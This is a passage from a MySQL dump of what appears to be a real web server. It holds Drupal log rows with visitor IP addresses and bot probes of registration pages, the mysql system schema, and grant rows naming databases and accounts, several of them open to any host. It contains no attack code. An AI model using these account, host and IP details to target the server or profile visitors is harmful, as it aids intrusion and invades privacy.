completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=node/7','','40.77.167.51',1449839606),(2424,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','','68.180.230.190',1449880411),(2425,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.34',1449902493),(2426,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/','','188.40.95.70',1449929815),(2427,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','46.118.118.215',1449956959),(2428,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user','','5.9.73.227',1449980309),(2429,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=rss.xml','','65.19.138.33',1450009266),(2430,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','157.55.39.25',1450031124),(2431,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','157.55.39.24',1450056832),(2432,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','31.134.131.2',1450089186),(2433,0,'cron','Attempting to re-run cron while it is already running.','a:0:{}',4,'','https://ollital.de/cms/','','82.221.105.7',1450112584),(2434,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','82.221.105.7',1450112586),(2435,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://t9s.info/','180.153.236.124',1450142229),(2436,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.73.173',1450165041),(2437,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/2/feed','','68.180.230.190',1450191468),(2438,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/3','','68.180.230.190',1450213902),(2439,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=node/7','','207.46.13.164',1450243571),(2440,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=rss.xml','','65.19.138.33',1450268497),(2441,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','','66.249.66.157',1450299637),(2442,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','','66.249.66.161',1450323289),(2443,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/1','','195.154.200.93',1450347601),(2444,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','104.238.169.154',1450363828),(2445,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','104.238.169.154',1450363875),(2446,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','104.238.169.154',1450363897),(2447,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','','66.249.66.153',1450370630),(2448,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/3','','66.249.78.195',1450400807),(2449,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','https://ollital.de/cms','195.28.183.88',1450427060),(2450,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','157.55.39.126',1450452940),(2451,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','188.166.85.191',1450486459),(2452,0,'user','Login attempt failed for %user.','a:1:{s:5:\"%user\";s:0:\"\";}',5,'','https://ollital.de/cms/?q=user/login','','115.159.86.48',1450501652),(2453,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','141.8.141.134',1450514756),(2454,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','180.76.15.158',1450544289),(2455,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/','','123.125.71.41',1450576743),(2456,0,'access denied','node/add','N;',4,'','http://t9s.info/cms/?q=node/add','http://t9s.info/','46.22.214.69',1450596160),(2457,0,'access denied','user/register','N;',4,'','http://t9s.info/cms/?q=user/register','http://t9s.info/cms/?q=node/add','46.22.214.69',1450596161),(2458,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.78.181',1450606849),(2459,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=user/login&destination=node/3%23comment-form','','74.91.28.210',1450638512),(2460,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=rss.xml','','207.46.13.135',1450678713),(2461,0,'access denied','node/add','N;',4,'','http://t9s.info/cms/?q=node/add','http://t9s.info/','46.22.214.97',1450689932),(2462,0,'access denied','user/register','N;',4,'','http://t9s.info/cms/?q=user/register','http://t9s.info/cms/?q=node/add','46.22.214.97',1450689932),(2463,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=rss.xml','','65.19.138.34',1450700533),(2464,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/7','','66.249.78.188',1450722421),(2465,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','104.238.169.123',1450735186),(2466,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','104.238.169.123',1450735187),(2467,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','104.238.169.123',1450735189),(2468,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user','','78.46.50.246',1450748235),(2469,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','5.147.41.205',1450781796),(2470,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1450803593),(2471,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://whois.domaintools.com/piraten-wuppertal.de','64.246.161.30',1450825328),(2472,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','141.8.141.141',1450847778),(2473,0,'access denied','node/add','N;',4,'','http://t9s.info/cms/?q=node/add','http://t9s.info/','23.247.139.204',1450854609),(2474,0,'access denied','user/register','N;',4,'','http://t9s.info/cms/?q=user/register','http://t9s.info/cms/?q=node/add','23.247.139.204',1450854609),(2475,0,'access denied','user/register','N;',4,'','http://t9s.info/cms/?q=user/register','http://t9s.info/','23.247.139.204',1450854610),(2476,0,'access denied','user/register','N;',4,'','http://t9s.info/cms/?q=user/register','http://t9s.info/','23.247.139.204',1450854610),(2477,0,'access denied','user/register','N;',4,'','https://ollital.de/cms/?q=user/register','https://ollital.de/','23.247.139.204',1450854612),(2478,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','62.212.73.211',1450872134),(2479,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/1','','188.40.95.70',1450903897),(2480,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','108.61.123.69',1450922435),(2481,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','108.61.123.69',1450922436),(2482,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','108.61.123.69',1450922438),(2483,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','31.134.131.2',1450932465),(2484,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','79.221.201.216',1450959448),(2485,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','157.55.39.63',1450988275),(2486,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','108.61.123.69',1450992535),(2487,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','108.61.123.69',1450992536),(2488,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','108.61.123.69',1450992538),(2489,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','84.201.153.23',1451011191),(2490,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://uptimechecker.com/t9s.info','45.79.87.95',1451034765),(2491,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','108.61.123.69',1451036481),(2492,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','108.61.123.69',1451036481),(2493,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','108.61.123.69',1451036483),(2494,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/','','94.23.217.201',1451056864),(2495,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','46.166.188.231',1451065390),(2496,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','46.166.188.231',1451065391),(2497,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','46.166.188.231',1451065392),(2498,0,'access denied','user/register','N;',4,'','http://t9s.info/cms/?q=user/register','http://t9s.info/','46.22.214.123',1451075816),(2499,0,'access denied','user/register','N;',4,'','http://t9s.info/cms/?q=user/register','http://t9s.info/','46.22.214.123',1451075816),(2500,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','','66.249.79.232',1451084087),(2501,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/1','','167.114.241.57',1451105948),(2502,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=user/password','','180.76.15.156',1451127896),(2503,0,'cron','Attempting to re-run cron while it is already running.','a:0:{}',4,'','https://ollital.de/cms/','','88.208.233.233',1451161206),(2504,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','88.208.233.233',1451161210),(2505,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','109.201.154.187',1451175272),(2506,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','109.201.154.187',1451175272),(2507,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','109.201.154.187',1451175274),(2508,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/3','','157.55.39.196',1451187269),(2509,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','180.76.15.33',1451211677),(2510,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=user/login&destination=node/3%23comment-form','','180.76.15.146',1451233494),(2511,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','5.147.41.205',1451259695),(2512,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','108.61.123.86',1451259933),(2513,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','108.61.123.86',1451259934),(2514,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','108.61.123.86',1451259936),(2515,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.34',1451285345),(2516,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','5.147.41.205',1451312074),(2517,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://t9s.info/','62.212.73.49',1451337367),(2518,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','87.250.244.13',1451358986); /*!40000 ALTER TABLE `watchdog` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'drupal7' -- -- -- Current Database: `mysql` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `mysql` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `mysql`; -- -- Table structure for table `columns_priv` -- DROP TABLE IF EXISTS `columns_priv`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `columns_priv` ( `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `Db` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '', `Table_name` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `Column_name` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `Timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `Column_priv` set('Select','Insert','Update','References') CHARACTER SET utf8 NOT NULL DEFAULT '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`,`Column_name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Column privileges'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `columns_priv` -- LOCK TABLES `columns_priv` WRITE; /*!40000 ALTER TABLE `columns_priv` DISABLE KEYS */; /*!40000 ALTER TABLE `columns_priv` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `db` -- DROP TABLE IF EXISTS `db`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `db` ( `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `Db` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '', `Select_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Insert_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Update_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Delete_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Drop_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Grant_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `References_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Index_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Alter_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_tmp_table_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Lock_tables_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Show_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Alter_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Execute_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Event_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Trigger_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', PRIMARY KEY (`Host`,`Db`,`User`), KEY `User` (`User`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Database privileges'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `db` -- LOCK TABLES `db` WRITE; /*!40000 ALTER TABLE `db` DISABLE KEYS */; INSERT INTO `db` VALUES ('localhost','redmine_default','redmine_default','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('localhost','phpmyadmin','phpmyadmin','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('%','wordpress','wp_user','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('%','wordpress','wp_ollital','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('localhost','drupal7','drupal7','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('%','drupal7','drupal7','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('localhost','ollital_joomla','joomla3','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('localhost','vmail','vmail','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('’localhost’','vmail','‘vmail’','Y','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N'),('%','wupperwiki','wiki@localhost','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('%','wupperwiki','wiki','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'),('%','blt','blt@localhost','Y','Y','Y','Y','Y','Y','N','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y'); /*!40000 ALTER TABLE `db` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `event` -- DROP TABLE IF EXISTS `event`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `event` ( `db` char(64) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `name` char(64) NOT NULL DEFAULT '', `body` longblob NOT NULL, `definer` char(77) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `execute_at` datetime DEFAULT NULL, `interval_value` int(11) DEFAULT NULL, `interval_field` enum('YEAR','QUARTER','MONTH','DAY','HOUR','MINUTE','WEEK','SECOND','MICROSECOND','YEAR_MONTH','DAY_HOUR','DAY_MINUTE','DAY_SECOND','HOUR_MINUTE','HOUR_SECOND','MINUTE_SECOND','DAY_MICROSECOND','HOUR_MICROSECOND','MINUTE_MICROSECOND','SECOND_MICROSECOND') DEFAULT NULL, `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `modified` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', `last_executed` datetime DEFAULT NULL, `starts` datetime DEFAULT NULL, `ends` datetime DEFAULT NULL, `status` enum('ENABLED','DISABLED','SLAVESIDE_DISABLED') NOT NULL DEFAULT 'ENABLED', `on_completion` enum('DROP','PRESERVE') NOT NULL DEFAULT 'DROP', `sql_mode` set('REAL_AS_FLOAT','PIPES_AS_CONCAT','ANSI_QUOTES','IGNORE_SPACE','NOT_USED','ONLY_FULL_GROUP_BY','NO_UNSIGNED_SUBTRACTION','NO_DIR_IN_CREATE','POSTGRESQL','ORACLE','MSSQL','DB2','MAXDB','NO_KEY_OPTIONS','NO_TABLE_OPTIONS','NO_FIELD_OPTIONS','MYSQL323','MYSQL40','ANSI','NO_AUTO_VALUE_ON_ZERO','NO_BACKSLASH_ESCAPES','STRICT_TRANS_TABLES','STRICT_ALL_TABLES','NO_ZERO_IN_DATE','NO_ZERO_DATE','INVALID_DATES','ERROR_FOR_DIVISION_BY_ZERO','TRADITIONAL','NO_AUTO_CREATE_USER','HIGH_NOT_PRECEDENCE','NO_ENGINE_SUBSTITUTION','PAD_CHAR_TO_FULL_LENGTH') NOT NULL DEFAULT '', `comment` char(64) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `originator` int(10) unsigned NOT NULL, `time_zone` char(64) CHARACTER SET latin1 NOT NULL DEFAULT 'SYSTEM', `character_set_client` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL, `collation_connection` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL, `db_collation` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL, `body_utf8` longblob, PRIMARY KEY (`db`,`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Events'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `event` -- LOCK TABLES `event` WRITE; /*!40000 ALTER TABLE `event` DISABLE KEYS */; /*!40000 ALTER TABLE `event` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `func` -- DROP TABLE IF EXISTS `func`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `func` ( `name` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `ret` tinyint(1) NOT NULL DEFAULT '0', `dl` char(128) COLLATE utf8_bin NOT NULL DEFAULT '', `type` enum('function','aggregate') CHARACTER SET utf8 NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='User defined functions'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `func` -- LOCK TABLES `func` WRITE; /*!40000 ALTER TABLE `func` DISABLE KEYS */; /*!40000 ALTER TABLE `func` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `help_category` -- DROP TABLE IF EXISTS `help_category`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `help_category` ( `help_category_id` smallint(5) unsigned NOT NULL, `name` char(64) NOT NULL, `parent_category_id` smallint(5) unsigned DEFAULT NULL, `url` text NOT NULL, PRIMARY KEY (`help_category_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help categories'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `help_category` -- LOCK TABLES `help_category` WRITE; /*!40000 ALTER TABLE `help_category` DISABLE KEYS */; INSERT INTO `help_category` VALUES (1,'Geographic',0,''),(2,'Polygon properties',35,''),(3,'Numeric Functions',39,''),(4,'WKT',35,''),(5,'Plugins',36,''),(6,'Control flow functions',39,''),(7,'MBR',35,''),(8,'Transactions',36,''),(9,'Help Metadata',36,''),(10,'Account Management',36,''),(11,'Point properties',35,''),(12,'Encryption Functions',39,''),(13,'LineString properties',35,''),(14,'Miscellaneous Functions',39,''),(15,'Logical operators',39,''),(16,'Functions and Modifiers for Use with GROUP BY',36,''),(17,'Information Functions',39,''),(18,'Storage Engines',36,''),(19,'Bit Functions',39,''),(20,'Comparison operators',39,''),(21,'Table Maintenance',36,''),(22,'User-Defined Functions',36,''),(23,'Data Types',36,''),(24,'Compound Statements',36,''),(25,'Geometry constructors',35,''),(26,'GeometryCollection properties',1,''),(27,'Administration',36,''),(28,'Data Manipulation',36,''),(29,'Utility',36,''),(30,'Language Structure',36,''),(31,'Geometry relations',35,''),(32,'Date and Time Functions',39,''),(33,'WKB',35,''),(34,'Procedures',36,''),(35,'Geographic Features',36,''),(36,'Contents',0,''),(37,'Geometry properties',35,''),(38,'String Functions',39,''),(39,'Functions',36,''),(40,'Data Definition',36,''); /*!40000 ALTER TABLE `help_category` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `help_keyword` -- DROP TABLE IF EXISTS `help_keyword`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `help_keyword` ( `help_keyword_id` int(10) unsigned NOT NULL, `name` char(64) NOT NULL, PRIMARY KEY (`help_keyword_id`), UNIQUE KEY `name` (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='help keywords'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `help_keyword` -- LOCK TABLES `help_keyword` WRITE; /*!40000 ALTER TABLE `help_keyword` DISABLE KEYS */; INSERT INTO `help_keyword` VALUES (0,'JOIN'),(1,'HOST'),(2,'SERIALIZABLE'),(3,'CONTAINS'),(4,'SRID'),(5,'AT'),(6,'SCHEDULE'),(7,'RETURNS'),(8,'MASTER_SSL_CA'),(9,'NCHAR'),(10,'ONLY'),(11,'WORK'),(12,'OPEN'),(13,'ESCAPE'),(14,'EVENTS'),(15,'MONTH'),(16,'PROFILES'),(17,'ISCLOSED'),(18,'DUPLICATE'),(19,'REPLICATION'),(20,'UNLOCK'),(21,'INNODB'),(22,'YEAR_MONTH'),(23,'WITHIN'),(24,'PREPARE'),(25,'LOCK'),(26,'NDB'),(27,'INT4'),(28,'POLYGON'),(29,'MINUTE'),(30,'SEPARATOR'),(31,'DELETE'),(32,'ON'),(33,'CONNECTION'),(34,'CLOSE'),(35,'USE'),(36,'PRIVILEGES'),(37,'SPATIAL'),(38,'SQL_BUFFER_RESULT'),(39,'SECURITY'),(40,'AUTOEXTEND_SIZE'),(41,'NDBCLUSTER'),(42,'LEVEL'),(43,'BINARY'),(44,'CURRENT_USER'),(45,'HOUR_MINUTE'),(46,'UPDATE'),(47,'PRESERVE'),(48,'INTO'),(49,'POLYFROMWKB'),(50,'VARIABLE'),(51,'ROLLBACK'),(52,'TIMESTAMP'),(53,'IMPORT'),(54,'CHECKSUM'),(55,'THEN'),(56,'ENGINES'),(57,'HANDLER'),(58,'DAY_SECOND'),(59,'HELP_DATE'),(60,'BOOLEAN'),(61,'MOD'),(62,'CLASS_ORIGIN'),(63,'MPOLYFROMWKB'),(64,'ITERATE'),(65,'DO'),(66,'DATE'),(67,'FULLTEXT'),(68,'COMMENT'),(69,'MASTER_CONNECT_RETRY'),(70,'MASTER_LOG_FILE'),(71,'PRECISION'),(72,'REQUIRE'),(73,'LONG'),(74,'OPTION'),(75,'REORGANIZE'),(76,'ELSE'),(77,'EXTERIORRING'),(78,'GEOMFROMWKB'),(79,'FROM'),(80,'MULTIPOLYGON'),(81,'LEFT'),(82,'ELSEIF'),(83,'COMPACT'),(84,'DEC'),(85,'FOR'),(86,'WARNINGS'),(87,'STRING'),(88,'CONDITION'),(89,'ENCLOSED'),(90,'AGGREGATE'),(91,'FIELDS'),(92,'KILL'),(93,'DISJOINT'),(94,'TABLESPACE'),(95,'OVERLAPS'),(96,'INFILE'),(97,'MBREQUAL'),(98,'HELP_VERSION'),(99,'ORDER'),(100,'USING'),(101,'MIDDLEINT'),(102,'GRANT'),(103,'MBRINTERSECTS'),(104,'GEOMETRYN'),(105,'GEOMETRYFROMTEXT'),(106,'FOREIGN'),(107,'CACHE'),(108,'MYSQL_ERRNO'),(109,'SCHEMAS'),(110,'LEADING'),(111,'CONSTRAINT_NAME'),(112,'CONVERT'),(113,'DYNAMIC'),(114,'POLYGONFROMTEXT'),(115,'ENVELOPE'),(116,'HAVING'),(117,'STARTING'),(118,'RELOAD'),(119,'ISSIMPLE'),(120,'AUTOCOMMIT'),(121,'REVOKE'),(122,'EXPLAIN'),(123,'CSV'),(124,'OUTFILE'),(125,'LOW_PRIORITY'),(126,'FILE'),(127,'NODEGROUP'),(128,'SCHEMA'),(129,'MLINEFROMWKB'),(130,'DUAL'),(131,'MULTIPOINTFROMWKB'),(132,'MULTIPOINTFROMTEXT'),(133,'EXTENDED'),(134,'CROSS'),(135,'CONTRIBUTORS'),(136,'NATIONAL'),(137,'GROUP'),(138,'SHA'),(139,'POINTN'),(140,'IGNORE_SERVER_IDS'),(141,'ASBINARY'),(142,'MBROVERLAPS'),(143,'OWNER'),(144,'TRUE'),(145,'CHARACTER'),(146,'SCHEMA_NAME'),(147,'TABLE'),(148,'CASCADE'),(149,'RELAY_LOG_POS'),(150,'ASWKB'),(151,'LEAVE'),(152,'MODIFY'),(153,'MATCH'),(154,'MASTER_LOG_POS'),(155,'DISTINCTROW'),(156,'X'),(157,'CURSOR'),(158,'CROSSES'),(159,'GEOMETRYCOLLECTIONFROMTEXT'),(160,'CHAIN'),(161,'FLUSH'),(162,'CREATE'),(163,'DESCRIBE'),(164,'PROCESSLIST'),(165,'DISCARD'),(166,'SOUNDS'),(167,'PACK_KEYS'),(168,'MULTILINESTRINGFROMTEXT'),(169,'INTERSECTS'),(170,'FAST'),(171,'LOOP'),(172,'VARCHARACTER'),(173,'BEFORE'),(174,'ALL'),(175,'REDUNDANT'),(176,'USER_RESOURCES'),(177,'PARTIAL'),(178,'END'),(179,'SECOND'),(180,'FLOAT8'),(181,'PREV'),(182,'MBRCONTAINS'),(183,'OR'),(184,'IDENTIFIED'),(185,'POINTFROMTEXT'),(186,'MASTER_SSL_CIPHER'),(187,'SQL_SLAVE_SKIP_COUNTER'),(188,'BOTH'),(189,'YEAR'),(190,'UNIQUE'),(191,'TRIGGERS'),(192,'RESIGNAL'),(193,'MASTER_SSL'),(194,'DATE_ADD'),(195,'LIKE'),(196,'PLUGIN'),(197,'MULTIPOINT'),(198,'FETCH'),(199,'MBRWITHIN'),(200,'COLUMN'),(201,'USAGE'),(202,'MEMORY'),(203,'QUERY'),(204,'Y'),(205,'LINES'),(206,'SQL_THREAD'),(207,'INTERIORRINGN'),(208,'NUMINTERIORRINGS'),(209,'MAX_QUERIES_PER_HOUR'),(210,'TRANSACTION'),(211,'STDDEV'),(212,'INT1'),(213,'RIGHT'),(214,'MAX_ROWS'),(215,'ALTER'),(216,'NATURAL'),(217,'MULTILINESTRING'),(218,'VARIABLES'),(219,'ESCAPED'),(220,'KEY_BLOCK_SIZE'),(221,'MPOINTFROMTEXT'),(222,'CHAR'),(223,'UPGRADE'),(224,'INTERVAL'),(225,'NAME'),(226,'REFERENCES'),(227,'STORAGE'),(228,'ISOLATION'),(229,'EVERY'),(230,'INT8'),(231,'AUTHORS'),(232,'RESTRICT'),(233,'UNCOMMITTED'),(234,'LINESTRINGFROMTEXT'),(235,'IS'),(236,'NOT'),(237,'DATAFILE'),(238,'ANALYSE'),(239,'DES_KEY_FILE'),(240,'COMPRESSED'),(241,'START'),(242,'IF'),(243,'ROWS'),(244,'PURGE'),(245,'USER'),(246,'EXIT'),(247,'MERGE'),(248,'SQL_NO_CACHE'),(249,'DELAYED'),(250,'WRITE'),(251,